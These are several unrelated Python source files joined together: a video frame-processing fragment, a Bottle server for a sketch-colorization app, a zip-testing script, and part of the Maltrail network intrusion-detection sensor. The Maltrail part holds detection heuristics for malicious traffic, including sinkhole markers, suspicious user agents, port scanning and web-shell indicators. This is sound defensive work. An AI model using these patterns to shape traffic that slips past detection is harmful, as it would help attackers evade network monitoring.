#if len(non_empty_columns) > 100 and min(non_empty_columns) > self.height * 0.05 and max(non_empty_columns) < self.height * 0.95:
# data['rframe'] = data['raw'][0:self.height,min(non_empty_columns):max(non_empty_columns)+1:]
# data['small'] = cv2.resize(data['rframe'],(int(data['rframe'].shape[:2][1] * self.scale),int(data['rframe'].shape[:2][0] * self.scale)))
#else:
data['rframe'] = data['raw']
data['height'], data['width'], data['channels'] = data['rframe'].shape
data['scale'] = self.scale
data['gray'] = cv2.cvtColor(data['small'],cv2.COLOR_BGR2GRAY)
data['hsv'] = cv2.cvtColor(data['small'],cv2.COLOR_BGR2HSV)
data['lum'] = np.sum(data['hsv']) / float(data['hsv'].shape[0] * data['hsv'].shape[1] * data['hsv'].shape[2])
data['frame_mean'] = np.sum(data['small']) / float(data['small'].shape[0] * data['small'].shape[1] * data['small'].shape[2])
data['hist'] = cv2.calcHist([data['small']], [0, 1, 2], None, [8, 8, 8],[0, 256, 0, 256, 0, 256])
data['hist'] = cv2.normalize(data['hist'],5).flatten()
hist = data['hist']
hist = hist.ravel()/hist.sum()
logs = np.log2(hist+0.00001)
data['contrast'] = -1 * (hist*logs).sum()
#print('last video',read_frame)
data['original'] = data['rframe'].copy()
data['show'] = data['rframe'].copy()
###### transcription
if self.tas and self.tas.transcribe and self.tas.transcribe.stdout:
frame_transcribe = self.tas.transcribe.stdout.read(4096)
if frame_transcribe is not None:
data['transcribe'] = frame_transcribe.decode('ascii')
print(" Transcribe:",len(play_audio),frame_transcribe)
# drop frames if necessary, only if URL
if self.audio_fifo and self.video_fifo:
if data.get('audio_np') is not None and data.get('rframe') is not None:
self.microclockbase += 1 / self.fps
# instead of directly playing the video, buffer it a little
# buffer this for 30 frames and send them all at the same time
# this way we can stitch the audio together
window = self.fps
# TODO: don't do this in the middle of a break, cycle around and do it again
# this prevents the buffer from cutting in the middle of a break cluster
# NOTE: defect might be on the other side -- i.e., the :2 cuts the break in half
if read_frame % (2*window) == 0 and read_frame > 0 and data['shot_detect'] > data['frame'] - 5:
print('WARNING UPCOMING SPLIT SCENE, PLEASE FIX')
if read_frame % (2*window) == 0 and read_frame > 0:
cast_audio = bytes()
for buf in data_buf[0:2*window]:
cast_audio += buf['audio']
data_buf[0]['play_audio'] = cast_audio
# TODO: if no audio, pad with zero bytes
# this is basically a NMS algorithm. Find all the upcoming breaks
# and take the strongest one
new_buf = []
breaks = []
scenes = []
data_buf.append(data)
for buf in data_buf:
if last_buf is not None and buf['sbd'] == 0.0:
buf = shot.frame_to_contours(buf,last_buf)
buf = shot.frame_to_shots(buf,last_buf)
if buf['scene_detect'] == buf['frame']:
scenes.append((buf['shot_detect'],buf['sbd']))
if buf['shot_detect'] == buf['frame']:
breaks.append((buf['frame'],buf['sbd']))
last_buf = buf
new_buf.append(buf)
real_break = new_buf[0]['shot_detect']
# pick the oldest frame in a tie
if len(scenes) > 0:
scenes.sort(key=lambda x: x[0],reverse=True)
scenes.sort(key=lambda x: x[1],reverse=True)
#print(data['frame'],'upcoming scenes',scenes)
# TODO: include the cluster in the frame packet for logging
real_break = scenes[0][0]
last_scene = real_break
rolling_ste = []
play_audio = None
elif len(breaks) > 0:
breaks.sort(key=lambda x: x[0],reverse=True)
breaks.sort(key=lambda x: x[1],reverse=True)
#print('upcoming breaks',breaks)
real_break = breaks[0][0]
for buf in new_buf[0:2*window]:
# set this frame as the real scene for the block
if buf['scene_detect'] != last_scene:
buf['scene_detect'] = last_scene
# set this frame as the real shot for the block
buf['shot_detect'] = real_break
self.Q.put_nowait(buf)
data_buf = new_buf[2*window:]
else:
data_buf.append(data)
read_frame += 1
data = new_frame(read_frame)
data['last_scene'] = last_scene
elif self.video_fifo or self.image:
if data.get('rframe') is not None:
self.microclockbase += 1 / self.fps
self.Q.put_nowait(data)
read_frame += 1
data = new_frame(read_frame)
data['fps'] = self.fps
data['sample'] = self.sample
time.sleep(0.0001)
if self.video_fifo:
os.close(self.video_fifo)
if self.audio_fifo:
os.close(self.audio_fifo)
def read(self):
return self.Q.get()
def stop(self):
print('stop!')
self.stopped.value = 1
for i in range(self.Q.qsize()):
self.Q.get()
self.Q = None
#
# Turn the output from the lavfi filter into a dict with timestamps
# TODO: move this wherever it goes
#
def parse_caption(self,line):
clean = line.rstrip().decode('ascii', errors='ignore')
cleanr = re.compile('<.*?>')
clean = re.sub(cleanr,'',clean)
cleanr = re.compile('\{.an\d\}')
clean = re.sub(cleanr,' ',clean)
last_caption = ''
for line in clean.splitlines():
mo = re.search("^(\d\d:\d\d:\d\d),\d+? \-\-\> (\d\d:\d\d:\d\d),\d+",line)
if mo and mo.group():
last_caption = datetime.datetime.strftime(datetime.datetime.strptime(mo.group(1),"%H:%M:%S") + datetime.timedelta(seconds=self.clockbase),'%H:%M:%S')
self.caption_guide[last_caption] = {}
# add this to the internal frame clock
self.caption_guide[last_caption]['start'] = last_caption
self.caption_guide[last_caption]['stop'] = datetime.datetime.strftime(datetime.datetime.strptime(mo.group(2),"%H:%M:%S") + datetime.timedelta(seconds=self.clockbase),'%H:%M:%S')
self.caption_guide[last_caption]['caption'] = ''
elif last_caption:
if line.isdigit():
self.caption_guide[last_caption]['scene'] = int(line) - 1
else:
# TODO: remove duplicates
self.caption_guide[last_caption]['caption'] += line + ' '
# TODO: HACK. this belongs in the logger
#print('\t\t[%s] CC: ' % last_caption,line)
if last_caption is not '':
return last_caption,self.caption_guide[last_caption]['caption']
return last_caption,''
|
server.py
|
from config import *
if multiple_process:
from gevent import monkey
monkey.patch_all()
import re
import os
import cv2
import time
import json
import base64
import shutil
import datetime
import threading
import numpy as np
from bottle import route, run, static_file, request, BaseRequest, response
from ai import *
from tricks import *
BaseRequest.MEMFILE_MAX = 10000 * 1000
def get_request_image(name):
img = request.forms.get(name)
img = re.sub('^data:image/.+;base64,', '', img)
img = base64.urlsafe_b64decode(img)
img = np.fromstring(img, dtype=np.uint8)
img = cv2.imdecode(img, -1)
return img
@route('/<filename:path>')
def send_static(filename):
return static_file(filename, root='./game')
@route('/')
def send_static():
return static_file("index.html", root='./game')
sketch_upload_pool = []
painting_pool = []
def handle_sketch_upload_pool():
if len(sketch_upload_pool) > 0:
room, sketch, method = sketch_upload_pool[0]
del sketch_upload_pool[0]
room_path = 'game/rooms/' + room
print('processing sketch in ' + room_path)
if os.path.exists(room_path + '/sketch.improved.jpg'):
improved_sketch = cv2.imread(room_path + '/sketch.improved.jpg')
print('lucky to find improved sketch')
else:
improved_sketch = sketch.copy()
improved_sketch = min_resize(improved_sketch, 512)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
improved_sketch = go_tail(improved_sketch)
cv2.imwrite(room_path + '/sketch.improved.jpg', improved_sketch)
color_sketch = improved_sketch.copy()
std = cal_std(color_sketch)
print('std = ' + str(std))
need_de_painting = (std > 100.0) and method == 'rendering'
if method=='recolorization' or need_de_painting:
if os.path.exists(room_path + '/sketch.recolorization.jpg') or os.path.exists(room_path + '/sketch.de_painting.jpg'):
print('lucky to find lined sketch')
else:
improved_sketch = go_passline(color_sketch)
improved_sketch = min_k_down_c(improved_sketch, 2)
improved_sketch = cv_denoise(improved_sketch)
improved_sketch = go_tail(improved_sketch)
improved_sketch = sensitive(improved_sketch, s=5.0)
cv2.imwrite(room_path + '/sketch.recolorization.jpg', min_black(improved_sketch))
if need_de_painting:
cv2.imwrite(room_path + '/sketch.de_painting.jpg', min_black(improved_sketch))
print('In rendering mode, the user has uploaded a painting, and I have translated it into a sketch.')
print('sketch lined')
cv2.imwrite(room_path + '/sketch.colorization.jpg', min_black(color_sketch))
cv2.imwrite(room_path + '/sketch.rendering.jpg', eye_black(color_sketch))
print('sketch improved')
return
def handle_painting_pool():
if len(painting_pool) > 0:
room, ID, sketch, alpha, reference, points, method, lineColor, line = painting_pool[0]
del painting_pool[0]
room_path = 'game/rooms/' + room
print('processing painting in ' + room_path)
sketch_1024 = k_resize(sketch, 64)
if os.path.exists(room_path + '/sketch.de_painting.jpg') and method == 'rendering':
vice_sketch_1024 = k_resize(cv2.imread(room_path + '/sketch.de_painting.jpg', cv2.IMREAD_GRAYSCALE), 64)
sketch_256 = mini_norm(k_resize(min_k_down(vice_sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(vice_sketch_1024, 4), 32))
else:
sketch_256 = mini_norm(k_resize(min_k_down(sketch_1024, 2), 16))
sketch_128 = hard_norm(sk_resize(min_k_down(sketch_1024, 4), 32))
print('sketch prepared')
if debugging:
cv2.imwrite(room_path + '/sketch.128.jpg', sketch_128)
cv2.imwrite(room_path + '/sketch.256.jpg', sketch_256)
baby = go_baby(sketch_128, opreate_normal_hint(ini_hint(sketch_128), points, type=0, length=1))
baby = de_line(baby, sketch_128)
for _ in range(16):
baby = blur_line(baby, sketch_128)
baby = go_tail(baby)
baby = clip_15(baby)
if debugging:
cv2.imwrite(room_path + '/baby.' + ID + '.jpg', baby)
print('baby born')
composition = go_gird(sketch=sketch_256, latent=d_resize(baby, sketch_256.shape), hint=ini_hint(sketch_256))
if line:
composition = emph_line(composition, d_resize(min_k_down(sketch_1024, 2), composition.shape), lineColor)
composition = go_tail(composition)
cv2.imwrite(room_path + '/composition.' + ID + '.jpg', composition)
print('composition saved')
painting_function = go_head
if method == 'rendering':
painting_function = go_neck
print('method: ' + method)
result = painting_function(
sketch=sketch_1024,
global_hint=k_resize(composition, 14),
local_hint=opreate_normal_hint(ini_hint(sketch_1024), points, type=2, length=2),
global_hint_x=k_resize(reference, 14) if reference is not None else k_resize(composition, 14),
alpha=(1 - alpha) if reference is not None else 1
)
result = go_tail(result)
cv2.imwrite(room_path + '/result.' + ID + '.jpg', result)
cv2.imwrite('results/' + room + '.' + ID + '.jpg', result)
if debugging:
cv2.imwrite(room_path + '/icon.' + ID + '.jpg', max_resize(result, 128))
return
@route('/upload_sketch', method='POST')
def upload_sketch():
room = request.forms.get("room")
previous_step = request.forms.get("step")
if previous_step == 'sample':
new_room_id = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
shutil.copytree('game/samples/' + room, 'game/rooms/' + new_room_id)
print('copy ' + 'game/samples/' + room + ' to ' + 'game/rooms/' + new_room_id)
room = new_room_id
ID = datetime.datetime.now().strftime('H%HM%MS%S')
method = request.forms.get("method")
if room == 'new':
room = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
room_path = 'game/rooms/' + room
os.makedirs(room_path, exist_ok=True)
sketch = from_png_to_jpg(get_request_image('sketch'))
cv2.imwrite(room_path + '/sketch.original.jpg', sketch)
print('original_sketch saved')
else:
room_path = 'game/rooms/' + room
sketch = cv2.imread(room_path + '/sketch.original.jpg')
print('sketch upload pool get request: ' + method)
sketch_upload_pool.append((room, sketch, method))
while True:
time.sleep(0.1)
if os.path.exists(room_path + '/sketch.' + method + '.jpg'):
break
time.sleep(1.0)
return room + '_' + ID
@route('/request_result', method='POST')
def request_result():
room = request.forms.get("room")
previous_step = request.forms.get("step")
if previous_step == 'sample':
new_room_id = datetime.datetime.now().strftime('%b%dH%HM%MS%S') + 'R' + str(np.random.randint(100, 999))
shutil.copytree('game/samples/' + room, 'game/rooms/' + new_room_id)
print('copy ' + 'game/samples/' + room + ' to ' + 'game/rooms/' + new_room_id)
room = new_room_id
ID = datetime.datetime.now().strftime('H%HM%MS%S')
room_path = 'game/rooms/' + room
options_str = request.forms.get("options")
if debugging:
with open(room_path + '/options.' + ID + '.json', 'w') as f:
f.write(options_str)
options = json.loads(options_str)
method = options["method"]
sketch = cv2.imread(room_path + '/sketch.' + method + '.jpg', cv2.IMREAD_GRAYSCALE)
alpha = float(options["alpha"])
points = options["points"]
for _ in range(len(points)):
points[_][1] = 1 - points[_][1]
if options["hasReference"]:
reference = from_png_to_jpg(get_request_image('reference'))
cv2.imwrite(room_path + '/reference.' + ID + '.jpg', reference)
reference = s_enhance(reference)
else:
reference = None
print('request result room = ' + str(room) + ', ID = ' + str(ID))
lineColor = np.array(options["lineColor"])
line = options["line"]
painting_pool.append([room, ID, sketch, alpha, reference, points, method, lineColor, line])
while True:
time.sleep(0.1)
if os.path.exists(room_path + '/result.' + ID + '.jpg'):
break
time.sleep(1.0)
return room + '_' + ID
@route('/get_sample_list', method='POST')
def get_sample_list():
all_names = []
for (root, dirs, files) in os.walk("game/samples"):
all_names = dirs
break
all_names.sort()
result = json.dumps(all_names)
return result
@route('/save_as_sample', method='POST')
def save_as_sample():
room = request.forms.get("room")
step = request.forms.get("step")
previous_path = 'game/rooms/' + room
new_path = 'game/samples/' + room
os.makedirs(new_path, exist_ok=True)
def transfer(previous_file_name, new_file_name=None):
if new_file_name is None:
new_file_name = previous_file_name
if os.path.exists(previous_path + '/' + previous_file_name):
shutil.copy(previous_path + '/' + previous_file_name, new_path + '/' + new_file_name)
transfer('sketch.original.jpg')
transfer('sketch.improved.jpg')
transfer('sketch.colorization.jpg')
transfer('sketch.rendering.jpg')
transfer('sketch.recolorization.jpg')
transfer('sketch.de_painting.jpg')
transfer('result.' + step + '.jpg', 'result.sample.jpg')
transfer('reference.' + step + '.jpg', 'reference.sample.jpg')
transfer('icon.' + step + '.jpg', 'icon.sample.jpg')
transfer('composition.' + step + '.jpg', 'composition.sample.jpg')
transfer('options.' + step + '.json', 'options.sample.json')
print('saved')
return 'ok'
def server_loop():
while True:
time.sleep(0.173)
try:
handle_sketch_upload_pool()
handle_painting_pool()
except Exception as e:
print(e)
os.makedirs('game/rooms', exist_ok=True)
os.makedirs('results', exist_ok=True)
threading.Thread(target=server_loop).start()
if multiple_process:
run(host="0.0.0.0", port=80, server='gevent')
else:
run(host="0.0.0.0", port=8080)
|
test-zip.py
|
#!/usr/bin/env python3
import sys
from multiprocessing import Process, Queue
from pathlib import Path
from zipfile import ZipFile
def test_proc(dir_path, queue):
while True:
zip_path = queue.get()
if zip_path is None:
queue.put(None)
break
rel_path = zip_path.relative_to(dir_path)
zip_file = ZipFile(zip_path, 'r', allowZip64=True)
result = zip_file.testzip()
if result is None:
print(f'[+] {rel_path}')
else:
print(f'[-] {rel_path}, {result}')
def main():
if len(sys.argv) < 2:
print('usage: test-zip.py [path to directory] [proc count]')
return
dir_path = Path(sys.argv[1]).absolute()
if not dir_path.exists():
print('[-] directory does not exist')
return
proc_count = 1 # optimized for hdd
if len(sys.argv) >= 3:
proc_count = int(sys.argv[2])
procs = []
queue = Queue()
for _ in range(proc_count):
proc = Process(target=test_proc, args=(dir_path, queue,))
proc.start()
procs.append(proc)
for zip_path in dir_path.glob('**/*.zip'):
queue.put(zip_path)
queue.put(None)
for proc in procs:
proc.join()
if __name__ == '__main__':
main()
|
sensor.py
|
#!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
from __future__ import print_function # Requires: Python >= 2.6
import sys
sys.dont_write_bytecode = True
import core.versioncheck
import inspect
import math
import mmap
import optparse
import os
import platform
import re
import socket
import subprocess
import struct
import sys
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import inet_ntoa6
from core.attribdict import AttribDict
from core.common import check_connection
from core.common import check_sudo
from core.common import check_whitelisted
from core.common import load_trails
from core.enums import BLOCK_MARKER
from core.enums import PROTO
from core.enums import TRAIL
from core.log import create_log_directory
from core.log import get_error_log_handle
from core.log import log_error
from core.log import log_event
from core.parallel import worker
from core.parallel import write_block
from core.settings import check_memory
from core.settings import config
from core.settings import CAPTURE_TIMEOUT
from core.settings import CHECK_CONNECTION_MAX_RETRIES
from core.settings import CONFIG_FILE
from core.settings import CONSONANTS
from core.settings import DAILY_SECS
from core.settings import DLT_OFFSETS
from core.settings import DNS_EXHAUSTION_THRESHOLD
from core.settings import HTTP_TIME_FORMAT
from core.settings import IGNORE_DNS_QUERY_SUFFIXES
from core.settings import IPPROTO_LUT
from core.settings import LOCALHOST_IP
from core.settings import MMAP_ZFILL_CHUNK_LENGTH
from core.settings import MAX_RESULT_CACHE_ENTRIES
from core.settings import NAME
from core.settings import NO_SUCH_NAME_COUNTERS
from core.settings import NO_SUCH_NAME_PER_HOUR_THRESHOLD
from core.settings import PORT_SCANNING_THRESHOLD
from core.settings import read_config
from core.settings import REGULAR_SENSOR_SLEEP_TIME
from core.settings import SNAP_LEN
from core.settings import SUSPICIOUS_CONTENT_TYPES
from core.settings import SUSPICIOUS_DIRECT_DOWNLOAD_EXTENSIONS
from core.settings import SUSPICIOUS_DOMAIN_CONSONANT_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_ENTROPY_THRESHOLD
from core.settings import SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD
from core.settings import SUSPICIOUS_HTTP_PATH_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_PRE_CONDITION
from core.settings import SUSPICIOUS_HTTP_REQUEST_REGEXES
from core.settings import SUSPICIOUS_HTTP_REQUEST_FORCE_ENCODE_CHARS
from core.settings import SUSPICIOUS_PROXY_PROBE_PRE_CONDITION
from core.settings import SUSPICIOUS_UA_REGEX
from core.settings import trails
from core.settings import VALID_DNS_CHARS
from core.settings import VERSION
from core.settings import WEB_SHELLS
from core.settings import WHITELIST
from core.settings import WHITELIST_DIRECT_DOWNLOAD_KEYWORDS
from core.settings import WHITELIST_LONG_DOMAIN_NAME_KEYWORDS
from core.settings import WHITELIST_HTTP_REQUEST_PATHS
from core.settings import WHITELIST_UA_KEYWORDS
from core.update import update_ipcat
from core.update import update_trails
_buffer = None
_caps = []
_connect_sec = 0
_connect_src_dst = {}
_connect_src_details = {}
_count = 0
_locks = AttribDict()
_multiprocessing = None
_n = None
_result_cache = {}
_last_syn = None
_last_logged_syn = None
_last_udp = None
_last_logged_udp = None
_last_dns_exhaustion = None
_done_count = 0
_done_lock = threading.Lock()
_subdomains = {}
_subdomains_sec = None
_dns_exhausted_domains = set()
try:
import pcapy
except ImportError:
if subprocess.mswindows:
exit("[!] please install 'WinPcap' (e.g. 'http://www.winpcap.org/install/') and Pcapy (e.g. 'https://breakingcode.wordpress.com/?s=pcapy')")
else:
msg, _ = "[!] please install 'Pcapy'", platform.linux_distribution()[0].lower()
for distro, install in {("fedora", "centos"): "sudo yum install pcapy", ("debian", "ubuntu"): "sudo apt-get install python-pcapy"}.items():
if _ in distro:
msg += " (e.g. '%s')" % install
break
exit(msg)
def _check_domain_member(query, domains):
parts = query.lower().split('.')
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in domains:
return True
return False
def _check_domain_whitelisted(query):
return _check_domain_member(re.split(r"(?i)[^A-Z0-9._-]", query or "")[0], WHITELIST)
def _check_domain(query, sec, usec, src_ip, src_port, dst_ip, dst_port, proto, packet=None):
if query:
query = query.lower()
if ':' in query:
query = query.split(':', 1)[0]
if query.replace('.', "").isdigit(): # IP address
return
if _result_cache.get(query) == False:
return
result = False
if not _check_domain_whitelisted(query) and all(_ in VALID_DNS_CHARS for _ in query):
parts = query.split('.')
if getattr(trails, "_regex", None):
match = re.search(trails._regex, query)
if match:
group, trail = [_ for _ in match.groupdict().items() if _[1] is not None][0]
candidate = trails._regex.split("(?P<")[int(group[1:]) + 1]
candidate = candidate.split('>', 1)[-1].rstrip('|')[:-1]
if candidate in trails:
result = True
trail = match.group(0)
prefix, suffix = query[:match.start()], query[match.end():]
if prefix:
trail = "(%s)%s" % (prefix, trail)
if suffix:
trail = "%s(%s)" % (trail, suffix)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[candidate][0], trails[candidate][1]), packet)
if ".onion." in query:
trail = re.sub(r"(\.onion)(\..*)", r"\1(\2)", query)
_ = trail.split('(')[0]
if _ in trails:
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[_][0], trails[_][1]), packet)
if not result:
for i in xrange(0, len(parts)):
domain = '.'.join(parts[i:])
if domain in trails:
if domain == query:
trail = domain
else:
_ = ".%s" % domain
trail = "(%s)%s" % (query[:-len(_)], _)
if not (re.search(r"(?i)\A(d?ns|nf|mx)\d*\.", query) and any(_ in trails.get(domain, " ")[0] for _ in ("suspicious", "sinkhole"))): # e.g. ns2.nobel.su
if not ((query == trail) and any(_ in trails.get(domain, " ")[0] for _ in ("dynamic", "free web"))): # e.g. noip.com
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, trails[domain][0], trails[domain][1]), packet)
break
if not result and config.USE_HEURISTICS:
if len(parts[0]) > SUSPICIOUS_DOMAIN_LENGTH_THRESHOLD and '-' not in parts[0]:
trail = None
if len(parts) > 2:
trail = "(%s).%s" % ('.'.join(parts[:-2]), '.'.join(parts[-2:]))
elif len(parts) == 2:
trail = "(%s).%s" % (parts[0], parts[1])
else:
trail = query
if trail and not any(_ in trail for _ in WHITELIST_LONG_DOMAIN_NAME_KEYWORDS):
result = True
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, proto, TRAIL.DNS, trail, "long domain (suspicious)", "(heuristic)"), packet)
if result == False:
_result_cache[query] = False
def _process_packet(packet, sec, usec, ip_offset):
"""
Processes single (raw) IP layer data
"""
global _connect_sec
global _last_syn
global _last_logged_syn
global _last_udp
global _last_logged_udp
global _last_dns_exhaustion
global _subdomains_sec
try:
if len(_result_cache) > MAX_RESULT_CACHE_ENTRIES:
_result_cache.clear()
if config.USE_HEURISTICS:
if _locks.connect_sec:
_locks.connect_sec.acquire()
connect_sec = _connect_sec
_connect_sec = sec
if _locks.connect_sec:
_locks.connect_sec.release()
if sec > connect_sec:
for key in _connect_src_dst:
if len(_connect_src_dst[key]) > PORT_SCANNING_THRESHOLD:
_src_ip, _dst_ip = key.split('~')
if not check_whitelisted(_src_ip):
for _ in _connect_src_details[key]:
log_event((sec, usec, _src_ip, _[2], _dst_ip, _[3], PROTO.TCP, TRAIL.IP, _src_ip, "potential port scanning", "(heuristic)"), packet)
_connect_src_dst.clear()
_connect_src_details.clear()
ip_data = packet[ip_offset:]
ip_version = ord(ip_data[0]) >> 4
localhost_ip = LOCALHOST_IP[ip_version]
if ip_version == 0x04: # IPv4
ip_header = struct.unpack("!BBHHHBBH4s4s", ip_data[:20])
iph_length = (ip_header[0] & 0xf) << 2
fragment_offset = ip_header[4] & 0x1fff
if fragment_offset != 0:
return
protocol = ip_header[6]
src_ip = socket.inet_ntoa(ip_header[8])
dst_ip = socket.inet_ntoa(ip_header[9])
elif ip_version == 0x06: # IPv6
# Reference: http://chrisgrundemann.com/index.php/2012/introducing-ipv6-understanding-ipv6-addresses/
ip_header = struct.unpack("!BBHHBB16s16s", ip_data[:40])
iph_length = 40
protocol = ip_header[4]
src_ip = inet_ntoa6(ip_header[6])
dst_ip = inet_ntoa6(ip_header[7])
else:
return
if protocol == socket.IPPROTO_TCP: # TCP
src_port, dst_port, _, _, doff_reserved, flags = struct.unpack("!HHLLBB", ip_data[iph_length:iph_length+14])
if flags != 2 and config.plugin_functions:
if dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, dst_ip, trails[dst_ip][0], trails[dst_ip][1]), packet, skip_write=True)
elif src_ip in trails and dst_ip != localhost_ip:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, trails[src_ip][0], trails[src_ip][1]), packet, skip_write=True)
if flags == 2: # SYN set (only)
_ = _last_syn
_last_syn = (sec, src_ip, src_port, dst_ip, dst_port)
if _ == _last_syn: # skip bursts
return
if dst_ip in trails or "%s:%s" % (dst_ip, dst_port) in trails:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = dst_ip if dst_ip in trails else "%s:%s" % (dst_ip, dst_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
elif (src_ip in trails or "%s:%s" % (src_ip, src_port) in trails) and dst_ip != localhost_ip:
_ = _last_logged_syn
_last_logged_syn = _last_syn
if _ != _last_logged_syn:
trail = src_ip if src_ip in trails else "%s:%s" % (src_ip, src_port)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP if ':' not in trail else TRAIL.IPORT, trail, trails[trail][0], trails[trail][1]), packet)
if config.USE_HEURISTICS:
if dst_ip != localhost_ip:
key = "%s~%s" % (src_ip, dst_ip)
if key not in _connect_src_dst:
_connect_src_dst[key] = set()
_connect_src_details[key] = set()
_connect_src_dst[key].add(dst_port)
_connect_src_details[key].add((sec, usec, src_port, dst_port))
else:
tcph_length = doff_reserved >> 4
h_size = iph_length + (tcph_length << 2)
tcp_data = ip_data[h_size:]
if tcp_data.startswith("HTTP/"):
if any(_ in tcp_data[:tcp_data.find("\r\n\r\n")] for _ in ("X-Sinkhole:", "X-Malware-Sinkhole:", "Server: You got served", "Server: Apache 1.0/SinkSoft", "sinkdns.org")) or "\r\n\r\nsinkhole" in tcp_data:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, src_ip, "sinkhole response (malware)", "(heuristic)"), packet)
else:
index = tcp_data.find("<title>")
if index >= 0:
title = tcp_data[index + len("<title>"):tcp_data.find("</title>", index)]
if all(_ in title.lower() for _ in ("this domain", "has been seized")):
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, title, "seized domain (suspicious)", "(heuristic)"), packet)
content_type = None
first_index = tcp_data.find("\r\nContent-Type:")
if first_index >= 0:
first_index = first_index + len("\r\nContent-Type:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
content_type = tcp_data[first_index:last_index].strip().lower()
if content_type and content_type in SUSPICIOUS_CONTENT_TYPES:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, content_type, "content type (suspicious)", "(heuristic)"), packet)
method, path = None, None
index = tcp_data.find("\r\n")
if index >= 0:
line = tcp_data[:index]
if line.count(' ') == 2 and " HTTP/" in line:
method, path, _ = line.split(' ')
if method and path:
post_data = None
host = dst_ip
first_index = tcp_data.find("\r\nHost:")
path = path.lower()
if first_index >= 0:
first_index = first_index + len("\r\nHost:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
host = tcp_data[first_index:last_index]
host = host.strip().lower()
if host.endswith(":80"):
host = host[:-3]
if host and host[0].isalpha() and dst_ip in trails:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.IP, "%s (%s)" % (dst_ip, host.split(':')[0]), trails[dst_ip][0], trails[dst_ip][1]), packet)
elif config.CHECK_HOST_DOMAINS:
_check_domain(host, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif config.USE_HEURISTICS and config.CHECK_MISSING_HOST:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, "%s%s" % (host, path), "missing host header (suspicious)", "(heuristic)"), packet)
index = tcp_data.find("\r\n\r\n")
if index >= 0:
post_data = tcp_data[index + 4:]
if config.USE_HEURISTICS and dst_port == 80 and path.startswith("http://") and any(_ in path for _ in SUSPICIOUS_PROXY_PROBE_PRE_CONDITION) and not _check_domain_whitelisted(path.split('/')[2]):
trail = re.sub(r"(http://[^/]+/)(.+)", r"\g<1>(\g<2>)", path)
trail = re.sub(r"(http://)([^/(]+)", lambda match: "%s%s" % (match.group(1), match.group(2).split(':')[0].rstrip('.')), trail)
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.HTTP, trail, "potential proxy probe (suspicious)", "(heuristic)"), packet)
return
elif "://" in path:
url = path.split("://", 1)[1]
if '/' not in url:
url = "%s/" % url
host, path = url.split('/', 1)
if host.endswith(":80"):
host = host[:-3]
path = "/%s" % path
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
elif method == "CONNECT":
if '/' in path:
host, path = path.split('/', 1)
path = "/%s" % path
else:
host, path = path, '/'
if host.endswith(":80"):
host = host[:-3]
url = "%s%s" % (host, path)
proxy_domain = host.split(':')[0]
_check_domain(proxy_domain, sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, packet)
else:
url = "%s%s" % (host, path)
if config.USE_HEURISTICS:
user_agent, result = None, None
first_index = tcp_data.find("\r\nUser-Agent:")
if first_index >= 0:
first_index = first_index + len("\r\nUser-Agent:")
last_index = tcp_data.find("\r\n", first_index)
if last_index >= 0:
user_agent = tcp_data[first_index:last_index]
user_agent = urllib.unquote(user_agent).strip()
if user_agent:
result = _result_cache.get(user_agent)
if result is None:
if not any(_ in user_agent for _ in WHITELIST_UA_KEYWORDS):
match = re.search(SUSPICIOUS_UA_REGEX, user_agent)
if match:
def _(value):
return value.replace('(', "\\(").replace(')', "\\)")
parts = user_agent.split(match.group(0), 1)
if len(parts) > 1 and parts[0] and parts[-1]:
result = _result_cache[user_agent] = "%s (%s)" % (_(match.group(0)), _(user_agent))
else:
result = _result_cache[user_agent] = _(match.group(0)).join(("(%s)" if part else "%s") % _(part) for part in parts)
if not result:
_result_cache[user_agent] = False
if result:
log_event((sec, usec, src_ip, src_port, dst_ip, dst_port, PROTO.TCP, TRAIL.UA, result, "user agent (suspicious)", "(heuristic)"), packet)
if not _check_domain_whitelisted(host):
checks = [path.rstrip('/')]
if '?' in path:
checks.append(path.split('?')[0].rstrip('/'))
if '=' in path:
checks.append(path[:path.index('=') + 1])
_ = os.path.splitext(checks[-1])
if _[1]:
checks.append(_[0])
